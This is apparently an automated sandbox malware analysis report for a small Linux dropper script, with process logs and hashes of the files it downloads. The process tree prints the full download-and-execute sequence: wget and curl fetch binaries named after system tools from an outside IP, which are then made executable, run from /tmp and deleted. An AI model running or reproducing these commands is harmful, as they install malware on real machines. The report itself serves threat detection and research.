a3687f70e86f2efd6e683d0dfe2cc5e19efa6fd17339dbdba7428346050320a2

Analysis

max time kernel
3s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20/05/2024, 16:14

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
Size

2KB
MD5

6001677acc0dfe15ef8fbe53108140ee
SHA1

83c629e3db7bda0dc3f6df1b129d50f355586034
SHA256

a3687f70e86f2efd6e683d0dfe2cc5e19efa6fd17339dbdba7428346050320a2
SHA512

60f118c08ab9ce9b3a0b50fe5a83c7e99fb07d61912c49ff513b6bd8196b08f4d25bbd8fd6d3aa74da11ab6cbb0ce561149529b558b779a505917a3da18c583f

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/ntpd	1481	ntpd
/tmp/sshd	1495	sshd
/tmp/openssh	1500	openssh
/tmp/bash	1505	bash
/tmp/tftp	1510	tftp
/tmp/wget	1515	wget
/tmp/cron	1520	cron
/tmp/ftp	1525	ftp
/tmp/pftp	1530	pftp
/tmp/sh	1537	sh
/tmp/nut	1548	nut
/tmp/apache2	1553	apache2
/tmp/telnetd	1558	telnetd

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ftp	curl
File opened for modification	/tmp/sh	curl
File opened for modification	/tmp/wget	curl
File opened for modification	/tmp/pftp	curl
File opened for modification	/tmp/apache2	curl
File opened for modification	/tmp/ntpd	curl
File opened for modification	/tmp/bash	curl
File opened for modification	/tmp/telnetd	curl
File opened for modification	/tmp/sshd	curl
File opened for modification	/tmp/openssh	curl
File opened for modification	/tmp/tftp	curl
File opened for modification	/tmp/cron	curl
File opened for modification	/tmp/nut	curl

/tmp/6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
/tmp/6001677acc0dfe15ef8fbe53108140ee_JaffaCakes118
1⤵
PID:1474
- /usr/bin/wget
  wget http://192.236.160.43/ntpd
  2⤵
  PID:1475
- /usr/bin/curl
  curl -O http://192.236.160.43/ntpd
  2⤵
  - Writes file to tmp directory
  PID:1476
- /bin/chmod
  chmod +x ntpd
  2⤵
  PID:1480
- /tmp/ntpd
  ./ntpd
  2⤵
  - Executes dropped EXE
  PID:1481
- /bin/rm
  rm -rf ntpd
  2⤵
  PID:1482
- /usr/bin/wget
  wget http://192.236.160.43/sshd
  2⤵
  PID:1483
- /usr/bin/curl
  curl -O http://192.236.160.43/sshd
  2⤵
  - Writes file to tmp directory
  PID:1484
- /bin/chmod
  chmod +x sshd
  2⤵
  PID:1494
- /tmp/sshd
  ./sshd
  2⤵
  - Executes dropped EXE
  PID:1495
- /bin/rm
  rm -rf sshd
  2⤵
  PID:1496
- /usr/bin/wget
  wget http://192.236.160.43/openssh
  2⤵
  PID:1497
- /usr/bin/curl
  curl -O http://192.236.160.43/openssh
  2⤵
  - Writes file to tmp directory
  PID:1498
- /bin/chmod
  chmod +x openssh
  2⤵
  PID:1499
- /tmp/openssh
  ./openssh
  2⤵
  - Executes dropped EXE
  PID:1500
- /bin/rm
  rm -rf openssh
  2⤵
  PID:1501
- /usr/bin/wget
  wget http://192.236.160.43/bash
  2⤵
  PID:1502
- /usr/bin/curl
  curl -O http://192.236.160.43/bash
  2⤵
  - Writes file to tmp directory
  PID:1503
- /bin/chmod
  chmod +x bash
  2⤵
  PID:1504
- /tmp/bash
  ./bash
  2⤵
  - Executes dropped EXE
  PID:1505
- /bin/rm
  rm -rf bash
  2⤵
  PID:1506
- /usr/bin/wget
  wget http://192.236.160.43/tftp
  2⤵
  PID:1507
- /usr/bin/curl
  curl -O http://192.236.160.43/tftp
  2⤵
  - Writes file to tmp directory
  PID:1508
- /bin/chmod
  chmod +x tftp
  2⤵
  PID:1509
- /tmp/tftp
  ./tftp
  2⤵
  - Executes dropped EXE
  PID:1510
- /bin/rm
  rm -rf tftp
  2⤵
  PID:1511
- /usr/bin/wget
  wget http://192.236.160.43/wget
  2⤵
  PID:1512
- /usr/bin/curl
  curl -O http://192.236.160.43/wget
  2⤵
  - Writes file to tmp directory
  PID:1513
- /bin/chmod
  chmod +x wget
  2⤵
  PID:1514
- /tmp/wget
  ./wget
  2⤵
  - Executes dropped EXE
  PID:1515
- /bin/rm
  rm -rf wget
  2⤵
  PID:1516
- /usr/bin/wget
  wget http://192.236.160.43/cron
  2⤵
  PID:1517
- /usr/bin/curl
  curl -O http://192.236.160.43/cron
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/chmod
  chmod +x cron
  2⤵
  PID:1519
- /tmp/cron
  ./cron
  2⤵
  - Executes dropped EXE
  PID:1520
- /bin/rm
  rm -rf cron
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://192.236.160.43/ftp
  2⤵
  PID:1522
- /usr/bin/curl
  curl -O http://192.236.160.43/ftp
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/chmod
  chmod +x ftp
  2⤵
  PID:1524
- /tmp/ftp
  ./ftp
  2⤵
  - Executes dropped EXE
  PID:1525
- /bin/rm
  rm -rf ftp
  2⤵
  PID:1526
- /usr/bin/wget
  wget http://192.236.160.43/pftp
  2⤵
  PID:1527
- /usr/bin/curl
  curl -O http://192.236.160.43/pftp
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/chmod
  chmod +x pftp
  2⤵
  PID:1529
- /tmp/pftp
  ./pftp
  2⤵
  - Executes dropped EXE
  PID:1530
- /bin/rm
  rm -rf pftp
  2⤵
  PID:1531
- /usr/bin/wget
  wget http://192.236.160.43/sh
  2⤵
  PID:1532
- /usr/bin/curl
  curl -O http://192.236.160.43/sh
  2⤵
  - Writes file to tmp directory
  PID:1533
- /bin/chmod
  chmod +x sh
  2⤵
  PID:1536
- /tmp/sh
  ./sh
  2⤵
  - Executes dropped EXE
  PID:1537
- /bin/rm
  rm -rf sh
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://192.236.160.43/nut
  2⤵
  PID:1539
- /usr/bin/curl
  curl -O http://192.236.160.43/nut
  2⤵
  - Writes file to tmp directory
  PID:1545
- /bin/chmod
  chmod +x nut
  2⤵
  PID:1547
- /tmp/nut
  ./nut
  2⤵
  - Executes dropped EXE
  PID:1548
- /bin/rm
  rm -rf nut
  2⤵
  PID:1549
- /usr/bin/wget
  wget http://192.236.160.43/apache2
  2⤵
  PID:1550
- /usr/bin/curl
  curl -O http://192.236.160.43/apache2
  2⤵
  - Writes file to tmp directory
  PID:1551
- /bin/chmod
  chmod +x apache2
  2⤵
  PID:1552
- /tmp/apache2
  ./apache2
  2⤵
  - Executes dropped EXE
  PID:1553
- /bin/rm
  rm -rf apache2
  2⤵
  PID:1554
- /usr/bin/wget
  wget http://192.236.160.43/telnetd
  2⤵
  PID:1555
- /usr/bin/curl
  curl -O http://192.236.160.43/telnetd
  2⤵
  - Writes file to tmp directory
  PID:1556
- /bin/chmod
  chmod +x telnetd
  2⤵
  PID:1557
- /tmp/telnetd
  ./telnetd
  2⤵
  - Executes dropped EXE
  PID:1558
- /bin/rm
  rm -rf telnetd
  2⤵
  PID:1559

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/apache2

Filesize
9KB

MD5
3e531211d06886f2a957241f6e49b8ec

SHA1
34ccc5b40b93c6f0d11485fdf6923bcf53a67760

SHA256
1b111d0f0602539c5ceb6c5c194d89aee88c25d892c12acb15338f7f87e929fe

SHA512
858858d0870527c3c93a2a67607fec5fd201d9b7fafa79c82b00b4d983bce46a757c7440794d044fedce8ae44954907608f92ffd2102b273fcd3daa9830ac2d3

Download Submit
/tmp/bash

Filesize
9KB

MD5
00336954c184b7746c756ea8f9ef0730

SHA1
7fca67220519041660ae341967ab8b239dff0342

SHA256
71a573bf26399cdf641ea75d9c1d3467cf1fb784af4a9a257ab8c32b4b5dd7d4

SHA512
df38f54309a760bb4a5a9ce58bdf22e1695ea1f016dcea5b05fb22c615777e0cda81bd08b42897e9a75669a8a579f8ff7ad4ebb8a20ef082a2adb877c3ddf184

Download Submit
/tmp/cron

Filesize
9KB

MD5
1c52078ae6417da03a90dd4c3d4fd148

SHA1
381900a299bad1416f645261cbaa9c9702d5deb3

SHA256
b4d940ee67ddce30f01a152550346253c1a963f73b8ce8b31b1a165d5a65bed2

SHA512
5f3ca090ee6ffb9195990a410abaf9babeb78f443a0249bd1c59156f7575d8f5c70114a47358a20492f4e24388bf4965b14e85e449ed4c19b070892f9665b1fb

Download Submit
/tmp/ftp

Filesize
9KB

MD5
00202e360fc58c442ebea8a9cf7e34c2

SHA1
1aba79af106fe823891d1a651805f9958c860493

SHA256
d6bd72afd400abbe337f41e62bff039320f49aef3ee0d0d2dbb2e3eb8acb46ff

SHA512
6afcb949c62b1c13cca7605e03371cd98edb865630b29596f72cfd5eb787f93cf4d692953ce8aed01d61aa5e68bfc7508f202e3375bbeda18b0fe3502567a629

Download Submit
/tmp/ntpd

Filesize
9KB

MD5
34a9ed57d537560f5108e41b8a5f7c8f

SHA1
eaf2d8b4d9d40df53c1b4b04cddcb9fd2df10bd0

SHA256
7ff2ebcd901a10e7d412c2f41a8a2a6e2ee74c0c7c036482894b0b5ffebda43d

SHA512
b63e8919003c8af5e8f38f96d81f4e2d2496b107566085e70d43315debbe7948a6878dc4a09b6f184935924ee289bb2db615c3753f52cc03298737746575574b

Download Submit
/tmp/nut

Filesize
9KB

MD5
cd482150118316b8bb95f823c890f8ab

SHA1
0d0f8d5be373f744bf3b8b3b72cf588cc812a25e

SHA256
c4c65ec5974cc2879e8eb6d118e85ef19dc4fbf2c4dfefb2fd614950cc23cf6f

SHA512
28e2b9203f33112cb5d2640233ae7ef314ef3caaf6ee070cbdea7b647738137e815f40def937ae94fb19c2421f275ae051eab8f06e91d3fa186c230481c29eff

Download Submit
/tmp/openssh

Filesize
9KB

MD5
ed7b541410dd2eeaabac419c14ac7656

SHA1
25a478612b3f9a2daf1eff83856cc36b581776ac

SHA256
f40babdb709ec6b3ea572aaa00248ee6e5a2aca52a757afb493ebdc4019acc56

SHA512
95dd20b13137879e37b922999eb0916a07a87c256ee456a02c3e4142e95c816ad0c52fdf0931a80d0876c649b780a2b56c314375c495704b61de53a97d951016

Download Submit
/tmp/pftp

Filesize
9KB

MD5
3893ce38f28d5f3e52d644afd20ed191

SHA1
7f3aa97aeed94938a37c858328b24fb41d797925

SHA256
f3af004ce8a572e288ff99392594a69ac484200a3c5c86128f538a0629abeba6

SHA512
79f900f05acce5750fedb939b2b776a6d0990740c1e74cf6511a8c6afc32d09acad82caac8a7a3eb5e1e449c1a673129a013e381c28e63c498f3bc1f377f4865

Download Submit
/tmp/sh

Filesize
9KB

MD5
43f3a0b3868e8d62ee5f73caf4c3ad2d

SHA1
f37730f6e57a082a3fc5756f02f165d58e3f14b5

SHA256
574e625f49abac58c24fcb57c1bb51498daeacd36e9853ad63260a0443f40ece

SHA512
b3092a79dd578fdc52cb936f156a570ffc607f07fe44b12c52844bb0743c9026e5e69db9b869ea557c90cb427222e45eb4615af22f078978fe86133a41014304

Download Submit
/tmp/sshd

Filesize
9KB

MD5
148341b99e222f50d87b57817d9d8d74

SHA1
8d8b88a2c927e610fe0ea3729244d646dc536219

SHA256
e576ce30488aa16509fddcca48469523cf83585daa86c369633f4d7538da84be

SHA512
07abb4f7234d6db5fd291feb8c317f87d49753122e56396a9f3236dc89d0dd59225d8537bd3ab6a85fbe3bfef74d793774ada847619f05fc1b976da372b365b9

Download Submit
/tmp/telnetd

Filesize
9KB

MD5
89b0c74a466594fff0826c2790cc4ff3

SHA1
dd08e48ffd8dcfcbab89221890dd0b4dc43f6ac3

SHA256
efd064f25430bb11ed6d830115eb4b1c50bb9699665ea41c43d630a0c06248aa

SHA512
ca4ed50a3c0c95a74d15025bb1537e63f2be6a20a1865d1983d3b8777a5e72290c83cae46f9650ef04638ddf91d5c0b53bad400f1bb02b8c6c486cd1c542d077

Download Submit
/tmp/tftp

Filesize
9KB

MD5
be8fb5a04ce886800c8c41cfd3faf09b

SHA1
c90a5ec876d4c81fc39366f9a054d72adf9741b7

SHA256
92bb8a8679470f107ae1131d141d0bebfa2188925992d5213a5b67047f6ceb1c

SHA512
0e4d892b9f54166dfd7c12e5e896cc7cf4ed8e83f1f8153f8daab246d53b4b03acd0f859aab6863f1bc053c2b4d4b03e67c07360c11b1631ff14064614a27f55

Download Submit
/tmp/wget

Filesize
9KB

MD5
884dfc9ce2d6d45ac1a3128ad807eab0

SHA1
4339416af2a6c6aa7c3c131c6da46f1e30765853

SHA256
5662935f359137a8be02497b40ec4219ecd6ff68ebd286f26ae2460442bb1c10

SHA512
1b72102436f88138fd84dc3d8f6c7594ab46eb6e7799fa28de716dea71ddfb7f27d38eeabe554b8b71dfa6c212f3afa3c4aedc65b442e8d8c0a3cecf19236841

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads